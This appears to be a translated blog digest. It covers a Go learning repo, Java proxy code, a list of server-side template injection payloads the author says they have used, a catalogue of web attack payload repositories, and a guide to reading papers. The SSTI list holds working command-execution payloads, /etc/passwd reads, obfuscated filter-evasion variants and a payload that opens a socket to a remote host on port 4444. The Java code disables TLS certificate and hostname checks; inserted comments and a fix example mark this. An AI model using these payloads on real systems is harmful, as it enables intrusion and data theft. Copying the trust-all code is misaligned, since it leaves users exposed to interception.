
Go internals, security and reversing sections updated

Progress 19.2%

Like an idiot.

The Go repo on GitHub is written up to 5.4, so 5.1 can start going out. For the Go language, covering programming, internals, security and reverse engineering, there probably isn't anything else like it... didn't expect it, did you, this repository:

https://github.com/lazybootsafe/Go-Learning-With-Hack

Updates may stop at any time, depending on the core socialist values and the course of development.

Setting HTTP and HTTPS proxies in Java

1. Set system properties directly; once set, they apply to every network request

    // "proxyType"/"proxySet" are not read by current JDKs and "proxyHost"/"proxyPort" are
    // legacy names; the documented ones are http.proxyHost/http.proxyPort (https.* for HTTPS).
    System.setProperty("proxyType", "4");
    System.setProperty("proxyPort", "80");
    System.setProperty("proxyHost", "127.0.0.1");
    System.setProperty("proxySet", "true");
    System.setProperty("http.proxyHost", "127.0.0.1");
    System.setProperty("http.proxyPort", "80");

2. Use the java.net.Proxy class

package test;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.Proxy.Type;
import java.net.URL;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;

import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

public class HttpAndHttpsProxy {

    public static String HttpsProxy(String url, String param, String proxy, int port) {
        HttpsURLConnection httpsConn = null;
        PrintWriter out = null;
        BufferedReader in = null;
        StringBuilder result = new StringBuilder();
        try {
            URL urlClient = new URL(url);
            System.out.println("Requested URL========:" + urlClient);

            SSLContext sc = SSLContext.getInstance("TLS");
            // Trust any HTTPS certificate (see TrustAnyTrustManager below). This disables
            // certificate validation, so only use it against an intercepting proxy you control.
            sc.init(null, new TrustManager[] { new TrustAnyTrustManager() }, new java.security.SecureRandom());
            // Create the proxy. Even for HTTPS the type is Type.HTTP: the client sends a
            // CONNECT request to the proxy and runs TLS inside the tunnel.
            Proxy proxy1 = new Proxy(Type.HTTP, new InetSocketAddress(proxy, port));
            // Open the connection through the proxy
            httpsConn = (HttpsURLConnection) urlClient.openConnection(proxy1);

            httpsConn.setSSLSocketFactory(sc.getSocketFactory());
            httpsConn.setHostnameVerifier(new TrustAnyHostnameVerifier());
            // Common request headers
            httpsConn.setRequestProperty("accept", "*/*");
            httpsConn.setRequestProperty("connection", "Keep-Alive");
            httpsConn.setRequestProperty("user-agent",
                    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
            // Both lines are required to send a POST request
            httpsConn.setDoOutput(true);
            httpsConn.setDoInput(true);
            // Output stream of the URLConnection
            out = new PrintWriter(httpsConn.getOutputStream());
            // Send the request parameters
            out.print(param);
            // Flush the output buffer
            out.flush();
            // BufferedReader to read the response body
            in = new BufferedReader(
                    new InputStreamReader(httpsConn.getInputStream()));
            String line;
            while ((line = in.readLine()) != null) {
                result.append(line);
            }
            System.out.println("====result====" + result);
            System.out.println("Response status:" + httpsConn.getResponseMessage());
            // Close the connection
            httpsConn.disconnect();

        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (in != null) {
                    in.close();
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
            if (out != null) {
                out.close();
            }
        }

        return result.toString();
    }

    public static String HttpProxy(String url, String param, String proxy, int port) {
        HttpURLConnection httpConn = null;
        PrintWriter out = null;
        BufferedReader in = null;
        StringBuilder result = new StringBuilder();
        try {
            URL urlClient = new URL(url);
            System.out.println("Requested URL========:" + urlClient);
            // Create the proxy
            Proxy proxy1 = new Proxy(Type.HTTP, new InetSocketAddress(proxy, port));
            // Open the connection through the proxy
            httpConn = (HttpURLConnection) urlClient.openConnection(proxy1);
            // Common request headers
            httpConn.setRequestProperty("accept", "*/*");
            httpConn.setRequestProperty("connection", "Keep-Alive");
            httpConn.setRequestProperty("user-agent",
                    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
            // Both lines are required to send a POST request
            httpConn.setDoOutput(true);
            httpConn.setDoInput(true);
            // Output stream of the URLConnection
            out = new PrintWriter(httpConn.getOutputStream());
            // Send the request parameters
            out.print(param);
            // Flush the output buffer
            out.flush();
            // BufferedReader to read the response body
            in = new BufferedReader(
                    new InputStreamReader(httpConn.getInputStream()));
            String line;
            while ((line = in.readLine()) != null) {
                result.append(line);
            }
            System.out.println("====result====" + result);
            System.out.println("Response status:" + httpConn.getResponseMessage());
            // Close the connection
            httpConn.disconnect();
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (in != null) {
                    in.close();
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
            if (out != null) {
                out.close();
            }
        }

        return result.toString();
    }

    // Accepts every certificate chain without checking it. Only acceptable when the
    // peer is an intercepting proxy you operate; never ship this in production code.
    private static class TrustAnyTrustManager implements X509TrustManager {

        public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        }

        public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        }

        public X509Certificate[] getAcceptedIssuers() {
            return new X509Certificate[] {};
        }
    }

    // Accepts any hostname, so the certificate is not checked against the requested host.
    private static class TrustAnyHostnameVerifier implements HostnameVerifier {
        public boolean verify(String hostname, SSLSession session) {
            return true;
        }
    }

    public static void main(String[] args) {
        HttpsProxy("https://www.baidu.com//", "", "127.0.0.1", 81);
        HttpProxy("http://evilxyz.xyz/", "", "127.0.0.1", 81);
    }

}
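Added here as an example, not code from the original post: the same HTTPS-through-proxy request, but with the trust-everything manager replaced by a trust store holding a single CA (the proxy's own CA when you run an intercepting proxy), so any other certificate fails the handshake. The class name, the proxy address 127.0.0.1:8080 and the file proxy-ca.pem are assumptions.

```java
import java.io.FileInputStream;
import java.io.InputStream;
import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.URL;
import java.security.KeyStore;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;

// Hypothetical class name; the rest is standard JDK API.
public class PinnedProxyClient {

    // Build an SSLContext whose only trust anchor is the CA in a PEM file (for example the
    // CA of an intercepting proxy you operate). Certificates chaining to anything else fail.
    static SSLContext contextTrustingOnly(String pemCaPath) throws Exception {
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        X509Certificate ca;
        try (InputStream pem = new FileInputStream(pemCaPath)) {
            ca = (X509Certificate) cf.generateCertificate(pem);
        }
        KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
        ks.load(null, null);                   // empty in-memory trust store
        ks.setCertificateEntry("proxy-ca", ca);
        TrustManagerFactory tmf =
                TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(ks);
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, tmf.getTrustManagers(), null);
        return ctx;
    }

    // GET through an HTTP proxy and return the status code. Proxy.Type.HTTP is used for
    // HTTPS too: the JDK sends CONNECT and runs TLS inside the tunnel.
    public static int statusVia(String url, String proxyHost, int proxyPort, String pemCaPath)
            throws Exception {
        Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyHost, proxyPort));
        HttpsURLConnection conn = (HttpsURLConnection) new URL(url).openConnection(proxy);
        conn.setSSLSocketFactory(contextTrustingOnly(pemCaPath).getSocketFactory());
        // The default HostnameVerifier is kept: the certificate must match the requested host.
        conn.setRequestMethod("GET");
        conn.setConnectTimeout(5000);
        conn.setReadTimeout(5000);
        try {
            return conn.getResponseCode();    // SSLHandshakeException if the chain is untrusted
        } finally {
            conn.disconnect();
        }
    }

    public static void main(String[] args) throws Exception {
        // Assumed values: local proxy on 8080, its CA exported to proxy-ca.pem
        System.out.println(statusVia("https://example.com/", "127.0.0.1", 8080, "proxy-ca.pem"));
    }
}
```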

Payloads I have used recently

1. Server Side Template Injection Payloads (SSTI payloads)

{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}} 
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
References :

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection

https://portswigger.net/research/server-side-template-injection

https://www.indusface.com/learning/application-security/server-side-template-injection/

Project:

https://github.com/payloadbox/ssti-payloads

The project contains many other payloads as well (have a look yourselves).
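Added example, not part of the original post or of the payloadbox project: the FreeMarker template-injection pattern behind the `?new()` payloads above, shown as the vulnerable rendering beside its fixed form, plus the resolver setting that refuses `?new()` outright. The class and method names are assumptions; it needs the freemarker library on the classpath.

```java
import java.io.StringReader;
import java.io.StringWriter;
import java.util.HashMap;
import java.util.Map;
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;

// Hypothetical class name; the FreeMarker calls are the library's real API.
public class FreemarkerSsti {

    // VULNERABLE: user input is concatenated into the template source, so template syntax
    // such as ${6*6} from the list above is parsed and evaluated by the engine.
    static String renderUnsafe(Configuration cfg, String userInput) throws Exception {
        Template t = new Template("greeting", new StringReader("Hello " + userInput), cfg);
        StringWriter out = new StringWriter();
        t.process(new HashMap<String, Object>(), out);
        return out.toString();
    }

    // FIXED: the template is a constant and the input is passed through the data model.
    // The engine never parses the input as template syntax, so "${6*6}" is echoed literally.
    static String renderSafe(Configuration cfg, String userInput) throws Exception {
        Template t = new Template("greeting", new StringReader("Hello ${name}"), cfg);
        Map<String, Object> model = new HashMap<>();
        model.put("name", userInput);
        StringWriter out = new StringWriter();
        t.process(model, out);
        return out.toString();
    }

    // Defence in depth for templates that must stay user-editable: forbid ?new() entirely,
    // so "freemarker.template.utility.Execute"?new() throws a TemplateException instead of
    // instantiating the class. SAFER_RESOLVER is the less strict alternative.
    static Configuration hardenedConfiguration() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_31);
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        return cfg;
    }

    public static void main(String[] args) throws Exception {
        Configuration cfg = hardenedConfiguration();
        String probe = "${6*6}";                       // harmless arithmetic probe from the list
        System.out.println(renderUnsafe(cfg, probe));  // "Hello 36"     -> input was evaluated
        System.out.println(renderSafe(cfg, probe));    // "Hello ${6*6}" -> input treated as data
    }
}
```

A response that turns `${6*6}` into `36` is the detection signal the probes above rely on; the fixed form never produces it because the user value is data, not template source.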

2. Git All The Payloads! A Collection Of Web Attack Payloads (git payloads for the web)

Project:

https://github.com/foospidy/payloads

Use get.sh to download and extract the files.

Payload Credits

fuzzdb - https://github.com/fuzzdb-project/fuzzdb

SecLists - https://github.com/danielmiessler/SecLists

xsuperbug - https://github.com/xsuperbug/payloads

NickSanzotta - https://github.com/NickSanzotta/BurpIntruder

7ioSecurity - https://github.com/7ioSecurity/XSS-Payloads

shadsidd - https://github.com/shadsidd

shikari1337 - https://www.shikari1337.com/list-of-xss-payloads-for-cross-site-scripting/

xmendez - https://github.com/xmendez/wfuzz

minimaxir - https://github.com/minimaxir/big-list-of-naughty-strings

xsscx - https://github.com/xsscx/Commodity-Injection-Signatures

TheRook - https://github.com/TheRook/subbrute

danielmiessler - https://github.com/danielmiessler/RobotsDisallowed

FireFart - https://github.com/FireFart/HashCollision-DOS-POC

HybrisDisaster - https://github.com/HybrisDisaster/aspHashDoS

swisskyrepo - https://github.com/swisskyrepo/PayloadsAllTheThings

1N3 - https://github.com/1N3/IntruderPayloads

cujanovic - https://github.com/cujanovic/Open-Redirect-Payloads

cujanovic - https://github.com/cujanovic/Content-Bruteforcing-Wordlist

cujanovic - https://github.com/cujanovic/subdomain-bruteforce-list

cujanovic - https://github.com/cujanovic/CRLF-Injection-Payloads

cujanovic - https://github.com/cujanovic/Virtual-host-wordlist

cujanovic - https://github.com/cujanovic/dirsearch-wordlist

lavalamp- - https://github.com/lavalamp-/password-lists

arnaudsoullie - https://github.com/arnaudsoullie/ics-default-passwords

scadastrangelove - https://github.com/scadastrangelove/SCADAPASS

jeanphorn - https://github.com/jeanphorn/wordlist

j3ers3 - https://github.com/j3ers3/PassList

nyxxxie - https://github.com/nyxxxie/awesome-default-passwords

foospidy - https://github.com/foospidy/web-cve-tests

OWASP

dirbuster - https://www.owasp.org/index.php/DirBuster

fuzzing_code_database - https://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database

JBroFuzz - https://www.owasp.org/index.php/JBroFuzz

Other

xss/ismailtasdelen.txt - https://github.com/ismailtasdelen/xss-payload-list

xss/jsf__k.txt - http://www.jsfuck.com/

xss/kirankarnad.txt - https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester

xss/packetstorm.txt - https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html

xss/smeegessec.com.txt - http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html

xss/d3adend.org.txt - http://d3adend.org/xss/ghettoBypass

xss/soaj1664ashar.txt - http://pastebin.com/u6FY1xDA

xss/billsempf.txt - https://www.sempf.net/post/Six-hundred-and-sixty-six-XSS-vectors-suitable-for-attacking-an-API.aspx (http://pastebin.com/48WdZR6L)

xss/787373.txt - https://84692bb0df6f30fc0687-25dde2f20b8e8c1bda75aeb96f737eae.ssl.cf1.rackcdn.com/--xss.html

xss/bhandarkar.txt - http://hackingforsecurity.blogspot.com/2013/11/xss-cheat-sheet-huge-list.html

xss/xssdb.txt - http://xssdb.net/xssdb.txt

xss/0xsobky.txt - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

xss/secgeek.txt - https://www.secgeek.net/solutions-for-xss-waf-challenge/

xss/reddit_xss_get.txt - All XSS GET requests from https://www.reddit.com/r/xss (as of 3/30/2016)

xss/rafaybaloch.txt - http://www.rafayhackingarticles.net/2016/09/breaking-great-wall-of-web-xss-waf.html

xss/alternume0.txt - https://www.openbugbounty.org/reports/722726/

xss/XssPayloads - https://twitter.com/XssPayloads

sqli/camoufl4g3.txt - https://github.com/camoufl4g3/SQLi-payload-Fuzz3R/blob/master/payloads.txt

sqli/c0rni3sm.txt - http://c0rni3sm.blogspot.in/2016/02/a-quite-rare-mssql-injection.html

sqli/sqlifuzzer.txt - https://github.com/ContactLeft/sqlifuzzer/tree/master/payloads

sqli/harisec.txt - https://hackerone.com/reports/297478

sqli/jstnkndy.txt - https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/

sqli/d0znpp.txt - https://medium.com/@d0znpp/how-to-bypass-libinjection-in-many-waf-ngwaf-1e2513453c0f

sqli/libinjection-bypasses.txt - https://gist.github.com/migolovanov/432fe28c8c7e9fa675ab3903c5eda77f

traversal/dotdotpwn.txt - https://github.com/wireghoul/dotdotpwn

codeinjection/fede.txt - https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/

commandinjection/ismailtasdelen-unix.txt - https://github.com/ismailtasdelen/command-injection-payload-list

commandinjection/ismailtasdelen-windows.txt - https://github.com/ismailtasdelen/command-injection-payload-list

CTF

Requests extracted from either packet captures or log files of capture the flag (ctf) events. Mostly raw data so not all requests are actual payloads, however requests should be deduplicated.

maccdc2010.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

maccdc2011.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

maccdc2012.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

ists12_2015.txt - Information Security Talent Search (http://ists.sparsa.org/), source: http://www.netresec.com/?page=ISTS

defcon20.txt - DEFCON Capture the Flag (https://www.defcon.org/html/links/dc-ctf.html), source: http://www.netresec.com/?page=PcapFiles

Miscellaneous

XSS references that may overlap with sources already included above:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

http://htmlpurifier.org/live/smoketests/xssAttacks.php

How to read a paper (for researchers)

As a research-type idiot, how do you read a paper?

Systematic reading

Now that you have a goal, the first step is to collect resources and bring them together.

Papers, blog posts, GitHub repositories, videos... Search Google for the term "pose estimation" and write down every resource you find for that keyword.

At this stage there is no limit on the number of resources. Anything you consider important can be collected, but make sure you build a shortlist of the useful papers, videos and articles.

The second step is to dig into every resource you consider relevant to the topic.

At this point you can draw up a table.

Track your level of understanding of each resource as you go.

Concretely, the best approach is to reach a 10%~20% understanding of every resource you have collected.

That way you can be sure you know enough about what you collected to judge its relevance accurately.

Good, you now have the basics of the technique.

Going further, read the more relevant articles and resources closely. Here a question comes up: roughly how many papers are enough?

Andrew Ng says: understanding 5~20 papers means you have a basic grasp of the field and its progress.

If you have worked through 50~100, you know the field very well.

At this point your table may look like this.

Read a paper at least three times

Next, a focused look at how to study a single paper.

Andrew Ng thinks that reading a paper from the first word to the last in one pass is probably not the best way to understand it.

The right way is to read a paper at least three times.

First pass: read the title, abstract and keywords carefully.

Second pass: read the introduction, conclusion and figures, and quickly skim the rest of the paper.

The goal of this pass is to grasp the key information: not only the introduction and conclusion but every summary of an intermediate result in the paper; skip any supplementary material.

Third pass: read the whole paper, but skip any math or technical terms you may not understand.

However, if you need a deep understanding of the field, you will have to work through those formulas and terms.

Ask yourself questions

How do you check that you have a basic grasp of the key information in the paper? Ask yourself questions!

Andrew Ng provides a list of questions to ask yourself while reading. Here is a selection.

1. Describe what the authors of the paper aim to accomplish, or perhaps did achieve.

2. If a new approach/technique/method was introduced in a paper, what are the key elements of the newly proposed approach?

3. What content within the paper is useful to you?

4. What other references do you want to follow?

He also shared some useful online resources.

The Machine Learning Subreddit:
https://www.reddit.com/r/MachineLearning/
The Deep Learning Subreddit:
https://www.reddit.com/r/deeplearning/
Paper With Code:
https://paperswithcode.com/
Research Gate:
https://www.researchgate.net/
And some top conferences, such as NIPS, ICML, ICLR...

However, Andrew Ng also stresses:

Learn steadily rather than short burst for longevity.

Steady study rather than short bursts is what makes learning last. This applies not only to machine learning but to academia as a whole.

Following Andrew Ng's method, the blogger reads at least four papers a month to reach that understanding.

Andrew Ng himself says in the video that he carries a batch of papers with him and reads them whenever he has time.

Hope this method helps you~ If you have a good way of studying papers, feel free to share it with us.

Blog post:
https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3
Video:
https://www.youtube.com/watch?v=733m6qBH-jI
